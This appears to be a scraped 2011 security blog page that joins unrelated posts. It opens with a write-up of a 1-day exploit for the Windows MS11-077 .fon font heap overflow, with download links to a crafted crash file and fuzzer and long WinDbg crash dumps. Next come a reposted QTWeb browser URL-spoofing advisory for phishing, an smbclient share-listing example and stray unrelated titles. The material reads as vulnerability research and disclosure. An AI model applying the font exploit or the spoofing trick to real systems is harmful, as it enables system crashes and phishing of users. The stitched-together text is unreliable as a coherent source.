All right. In the patched version, the sizeToAllocate variable would be computed as “((numElement + 7) / 8 ) + 5″. After spending some time, we suspected some range of the values, which should have taken ‘else’ branch, mistakenly took ‘then’ branch. Because it took ‘then’ branch, the allocated size was too small and this small size of allocation would lead to buffer overrun later (We understand this interpretation is far from scientific or logical reverse engineering, but you should know that this sloppy logic is enough to write an 1-day exploit.)

More specifically, we suspected the numElement values, satisfying 0xaa <= (numElement +7) /8 <= 0×100, would cause trouble (though we don’t know why and how !). We got this false fail idea in the patched binary from D. Brumeley et al.’s paper, “Automatic Patch-Based Exploit Generation is Possible: Techniques and Implications” (http://www.cs.berkeley.edu/~dawnsong/papers/apeg.pdf).

Things are getting clear. Our goal should be to find the input which satisfies the above statement. From the MS technet description, “improper handling of a specially crafted .fon font file”, and the function name _BmfdOpenFontContext(), which implies bitmap font driver something, we decided to manipulate .fon file. To play with .fon files, we implemented very simple ‘.fon’ file format recognizing fuzzer like tool. Using this tool, we figured ‘width’ field is related (see our *fuzzer* for details) to control numElement variable, and it leads to ‘heap overflow’ when the variable satisfies the vulnerable condition. What’s the interesting is that you only need to visit the directly containing .fon file to trigger bitmap font driver routines

I am attaching the .fon font file generated by our python codes (upon mkwinfont by Simon Tatham) and windbg crash dumps. We are not sure this bug can actually be used to execute the arbitrary codes, but we’d like to leave this question to you guys.

Download MS11-077 .fon buffer overrun exploit : my.fon.tar.gz
Download very simple *.fon* fuzzer like tool : ms11-077-fon-exploit.tar.gz

Breakpoint 1 hit
win32k!BmfdOpenFontContext+0xec:
90857f85 83c007 add eax,7
kd> r
eax=00000730 ebx=fe9aacf0 ecx=00000001 edx=00000001 esi=00000028 edi=fe7fc1f8
eip=90857f85 esp=8a2af8d0 ebp=8a2af904 iopl=0 nv up ei pl nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000206
win32k!BmfdOpenFontContext+0xec:
90857f85 83c007 add eax,7
kd> r eax
eax=00000730
kd> p
win32k!BmfdOpenFontContext+0xef:
90857f88 c1e803 shr eax,3
kd> p
win32k!BmfdOpenFontContext+0xf2:
90857f8b 894dfc mov dword ptr [ebp-4],ecx
kd> r eax
eax=000000e6
kd> g

*** Fatal System Error: 0×00000019
(0×00000020,0xFE1ED440,0xFE1ED5A0,0x4A2C000C)

Break instruction exception – code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

Connected to Windows 7 7600 x86 compatible target at (Wed Oct 12 18:38:42.012 2011 (UTC – 4:00)), ptr64 FALSE
Loading Kernel Symbols
………………………………………………………
……………………………………………………….
…………………..
Loading User Symbols
…………….
Loading unloaded module list
…..
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

Use !analyze -v to get detailed debugging information.

BugCheck 19, {20, fe1ed440, fe1ed5a0, 4a2c000c}

Probably caused by : win32k.sys ( win32k!EngFreeMem+1f )

Followup: MachineOwner
———

nt!RtlpBreakWithStatusInstruction:
828be394 cc int 3
kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

BAD_POOL_HEADER (19)
The pool is already corrupt at the time of the current request.
This may or may not be due to the caller.
The internal pool links must be walked to figure out a possible cause of
the problem, and then special pool applied to the suspect tags or the driver
verifier to a suspect driver.
Arguments:
Arg1: 00000020, a pool block header size is corrupt.
Arg2: fe1ed440, The pool entry we were looking for within the page.
Arg3: fe1ed5a0, The next pool entry.
Arg4: 4a2c000c, (reserved)

Debugging Details:
——————

BUGCHECK_STR: 0x19_20

POOL_ADDRESS: fe1ed440 Paged session pool

DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT

PROCESS_NAME: csrss.exe

CURRENT_IRQL: 2

LAST_CONTROL_TRANSFER: from 8292fe71 to 828be394

STACK_TEXT:
8a2af3b4 8292fe71 00000003 dda0d4a7 00000065 nt!RtlpBreakWithStatusInstruction
8a2af404 8293096d 00000003 fe1ed440 000001ff nt!KiBugCheckDebugBreak+0x1c
8a2af7c8 829721b6 00000019 00000020 fe1ed440 nt!KeBugCheck2+0x68b
8a2af844 9088c189 fe1ed448 00000000 fe7fc1d8 nt!ExFreePoolWithTag+0x1b1
8a2af858 90950204 fe1ed458 90959cdf fe40f480 win32k!EngFreeMem+0x1f
8a2af86c 90959cf5 fe1ed458 8a2af8d8 8a2af8b4 win32k!BmfdCloseFontContext+0×41
8a2af87c 90965501 fe40f480 00000000 8a2af930 win32k!BmfdDestroyFont+0×16
8a2af8b4 90965554 fe40f480 00000000 8a2afc70 win32k!PDEVOBJ::DestroyFont+0×67
8a2af8e4 908d0d1e 00000000 8a2af910 00000001 win32k!RFONTOBJ::vDeleteRFONT+0×33
8a2af928 908d2d15 fe40f480 050a071e 8a2afc70 win32k!RFONTOBJ::bMakeInactiveHelper+0x25a
8a2af984 908fba77 00000000 8a2afc70 00000000 win32k!RFONTOBJ::vMakeInactive+0×72
8a2afa04 908fbd74 8a2afc3c 00000000 00000004 win32k!RFONTOBJ::bInit+0xe3
8a2afa1c 908a4b2b 8a2afc3c 00000000 00000004 win32k!RFONTOBJ::vInit+0×16
8a2afcb8 908a4a2f 69010742 00000340 00000040 win32k!GreGetCharABCWidthsW+0×86
8a2afd14 8289642a 69010742 00000340 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8
8a2afd14 76f864f4 69010742 00000340 00000040 nt!KiFastCallEntry+0x12a
0435e9ac 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet

STACK_COMMAND: kb

FOLLOWUP_IP:
win32k!EngFreeMem+1f
9088c189 5e pop esi

SYMBOL_STACK_INDEX: 4

SYMBOL_NAME: win32k!EngFreeMem+1f

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: win32k

IMAGE_NAME: win32k.sys

DEBUG_FLR_IMAGE_TIMESTAMP: 4a5bc2a2

FAILURE_BUCKET_ID: 0x19_20_win32k!EngFreeMem+1f

BUCKET_ID: 0x19_20_win32k!EngFreeMem+1f

Followup: MachineOwner

WAR3格式

qtweb3.7.2

cq — Wed, 05 Oct 2011 04:47:13 +0000

################################################# QTWeb Internet Browser URL weakness lets remote attackers to do Spoof or phishing attacks Vendor URL: http://www.qtweb.net/ Vendor bugtrack=> http://code.google.com/p/qtweb/issues/detail?id=151 Advisore: http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html Vendor notify: YES exploit available: YES ################################################## ################### Description By vendor ################### QtWeb Internet Browser - lightweight, secure and portable browser having unique user interface and privacy features. QtWeb is an open source project based on Nokia's Qt framework and Apple's WebKit rendering engine (the same as being used in Apple Safari and Google Chrome). ###################### Vulnerability Description ###################### In a normal case when navigate to a site, the browser shows real URL But it has a weakness and a attacker can show a empty URL. This weakness can be used for pishing or spoof attacks because you can think that you are in bank of america for example and the browser don't show nothing in URL:) Whithout Any URL => http://3.bp.blogspot.com/-fo5gIcETZwE/TomQza97d0I/AAAAAAAAAFw/hMl0NPCRvqA/s400/qt1.jpg Also a attacker can compose a popup with atributes and it can be used too for spoof or phishing attacks. toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0 Popup Whithout Toolbars and address bar => http://3.bp.blogspot.com/-fixIYjkGkCE/TomSNePdc4I/AAAAAAAAAF0/vSKXq1aufo8/s400/qt2.jpg ################ Versions afected ################ QTweb 3.7.2 Vulnerable QTweb 3.7.3 (buils 087) Vulnerable and posible prior versions. ###################### Proof Of Concept ###################### QTweb 3.7.2 and 3.7.3 (buils 087) document.open() URL weakness Spoof testcase by Lostmon QTweb 3.7.2 and 3.7.3 (buils 087) document.open() URL weakness Spoof testcase by Lostmon First Click in this link ==> invoke PoC

and Look in result window, the address bar , don't show The url and if you write any url in the address bar, the browser do not navigate to it. This issue can be used to spoof sites or pishing attacks. Safari 5.1 (7534.50) ################ Solution ############### No solution at this time !!! ############### Timeline ############### Discovered :Mar 30, 2011 Vendor Notify: Sep 28, 2011 Vendor response: XXXXX Vendor Patch: XXXXXX Public Disclosure: Oct 03, 2011 ########################## €nd ######################## Atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....

No related posts.

samba4_smbclient_linux_winnt_share_file

cq — Thu, 22 Sep 2011 12:33:34 +0000

apt-get install samba4

http://wiki.samba.org/index.php/Samba4

http://wiki.samba.org/index.php/Samba4/HOWTO

例:
root@bt:~# smbclient -L 192.168.1.3
Enter root’s password:
Domain=[1UEUKFM1YARQQWT] OS=[Windows 7 Professional 7600] Server=[Windows 7 Professional 6.1]

Sharename Type Comment
——— —- ——-
Error returning browse list: NT_STATUS_NOT_SUPPORTED
session request to 192.168.1.3 failed (Called name not present)
session request to 192 failed (Called name not present)
session request to *SMBSERVER failed (Called name not present)
NetBIOS over TCP disabled — no workgroup available

root@bt:~# smbclient -L localhost -U%
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.0.0alpha9-GIT-9733816]

Sharename Type Comment
——— —- ——-
printers Printer All Printers
print$ Disk Printer Drivers
test Disk Samba server’s CD-ROM
IPC$ IPC IPC Service (%h server (Samba, Ubuntu))
ADMIN$ Disk DISK Service (%h server (Samba, Ubuntu))
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.0.0alpha9-GIT-9733816]

Server Comment
——— ——-

Workgroup Master
——— ——-

asp.net的几种页面传值方法